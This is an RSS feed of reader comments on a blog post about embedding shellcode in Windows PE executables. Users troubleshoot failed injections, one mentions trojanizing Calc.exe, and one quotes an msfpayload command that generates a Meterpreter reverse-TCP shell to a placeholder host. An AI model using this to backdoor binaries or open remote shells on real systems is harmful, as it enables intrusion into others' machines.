<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments for Unintended Results</title>
	<atom:link href="http://joxeankoret.com/blog/comments/feed/" rel="self" type="application/rss+xml" />
	<link>http://joxeankoret.com/blog</link>
	<description>Or maybe not</description>
	<lastBuildDate>Wed, 16 May 2012 06:40:59 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by joxean</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-485</link>
		<dc:creator>joxean</dc:creator>
		<pubDate>Wed, 16 May 2012 06:40:59 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-485</guid>
		<description>Well, sorry but &quot;still not working&quot; is not a helpful comment. Did you tried to put a 0xCC byte at the very beginning of your shellcode and launch the generated PE file under a debugger like IDA or OllyDbg to see what&#039;s happening? What exception are you getting?</description>
		<content:encoded><![CDATA[<p>Well, sorry but &#8220;still not working&#8221; is not a helpful comment. Did you tried to put a 0xCC byte at the very beginning of your shellcode and launch the generated PE file under a debugger like IDA or OllyDbg to see what&#8217;s happening? What exception are you getting?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by Anonymous</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-484</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Tue, 15 May 2012 23:25:56 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-484</guid>
		<description>Still not working 

how did you genarated the shellcode ?

thanks</description>
		<content:encoded><![CDATA[<p>Still not working </p>
<p>how did you genarated the shellcode ?</p>
<p>thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by joxean</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-483</link>
		<dc:creator>joxean</dc:creator>
		<pubDate>Mon, 14 May 2012 18:41:54 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-483</guid>
		<description>One note: The best thing you can do to debug it is to insert a 0xCC (int 3) at the start of your shellcode and launch in under a debugger to be absolutely sure it&#039;s working.

And one more note: The generated binary may fail at runtime *if* the scripts tries to patch a function whose body is smaller than the shellcode *and* the other overwritten functions is called before the one selected by the script. That&#039;s: if the shellcode overwrites other functions as well, it&#039;s very likely to crash at runtime.</description>
		<content:encoded><![CDATA[<p>One note: The best thing you can do to debug it is to insert a 0xCC (int 3) at the start of your shellcode and launch in under a debugger to be absolutely sure it&#8217;s working.</p>
<p>And one more note: The generated binary may fail at runtime *if* the scripts tries to patch a function whose body is smaller than the shellcode *and* the other overwritten functions is called before the one selected by the script. That&#8217;s: if the shellcode overwrites other functions as well, it&#8217;s very likely to crash at runtime.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by joxean</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-482</link>
		<dc:creator>joxean</dc:creator>
		<pubDate>Mon, 14 May 2012 18:38:09 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-482</guid>
		<description>There was a bug in my code: the section permissions were not correctly changed. I fixed the bugs in the latest version: http://code.google.com/p/pyew/source/detail?r=1965ca299354ef02acad124daf83ff8f7ea7e8da</description>
		<content:encoded><![CDATA[<p>There was a bug in my code: the section permissions were not correctly changed. I fixed the bugs in the latest version: <a href="http://code.google.com/p/pyew/source/detail?r=1965ca299354ef02acad124daf83ff8f7ea7e8da" rel="nofollow">http://code.google.com/p/pyew/source/detail?r=1965ca299354ef02acad124daf83ff8f7ea7e8da</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by Anonymous</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-481</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Mon, 14 May 2012 01:42:48 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-481</guid>
		<description>Same problem here. Just tried many shellcodes on diferente PE files and it crashs at runtime or simply do not execute the shellcode. :(</description>
		<content:encoded><![CDATA[<p>Same problem here. Just tried many shellcodes on diferente PE files and it crashs at runtime or simply do not execute the shellcode. <img src='http://joxeankoret.com/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by xer</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-480</link>
		<dc:creator>xer</dc:creator>
		<pubDate>Sun, 13 May 2012 12:18:09 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-480</guid>
		<description>Hi,
Thank you for sharing this very interesting . I Student and I try to embed Shellcode CMD/EXE in Calc.exe .
I think the problem comes from the file formatting shellcode.sc .
You can give a exemple for the shellcode.sc . (appreciate)
excuse me for my bad english
Cordialement.</description>
		<content:encoded><![CDATA[<p>Hi,<br />
Thank you for sharing this very interesting . I Student and I try to embed Shellcode CMD/EXE in Calc.exe .<br />
I think the problem comes from the file formatting shellcode.sc .<br />
You can give a exemple for the shellcode.sc . (appreciate)<br />
excuse me for my bad english<br />
Cordialement.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by ert</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-478</link>
		<dc:creator>ert</dc:creator>
		<pubDate>Thu, 10 May 2012 19:09:41 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-478</guid>
		<description>how did you genarated the shellcode ? 
I have tryed 
msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx C &gt; sh.sc but not sucseed</description>
		<content:encoded><![CDATA[<p>how did you genarated the shellcode ?<br />
I have tryed<br />
msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx C &gt; sh.sc but not sucseed</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by joxean</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-477</link>
		<dc:creator>joxean</dc:creator>
		<pubDate>Wed, 09 May 2012 08:06:23 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-477</guid>
		<description>I mean from here: http://code.google.com/p/pyew/source/checkout</description>
		<content:encoded><![CDATA[<p>I mean from here: <a href="http://code.google.com/p/pyew/source/checkout" rel="nofollow">http://code.google.com/p/pyew/source/checkout</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by AnonymousSR</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-476</link>
		<dc:creator>AnonymousSR</dc:creator>
		<pubDate>Wed, 09 May 2012 07:58:09 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-476</guid>
		<description>Mercurial’s repository ???
Did you mean &quot;http://code.google.com/p/pyew&quot; 
thanks</description>
		<content:encoded><![CDATA[<p>Mercurial’s repository ???<br />
Did you mean &#8220;http://code.google.com/p/pyew&#8221;<br />
thanks</p>
]]></content:encoded>
	</item>
	<item>
		<title>Comment on Embedding a shellcode in a PE file by Anonymous</title>
		<link>http://joxeankoret.com/blog/2012/05/06/embedding-a-shellcode-in-a-pe-file/comment-page-1/#comment-472</link>
		<dc:creator>Anonymous</dc:creator>
		<pubDate>Mon, 07 May 2012 13:34:05 +0000</pubDate>
		<guid isPermaLink="false">http://joxeankoret.com/blog/?p=507#comment-472</guid>
		<description>Fixed. Thank you!</description>
		<content:encoded><![CDATA[<p>Fixed. Thank you!</p>
]]></content:encoded>
	</item>
</channel>
</rss>

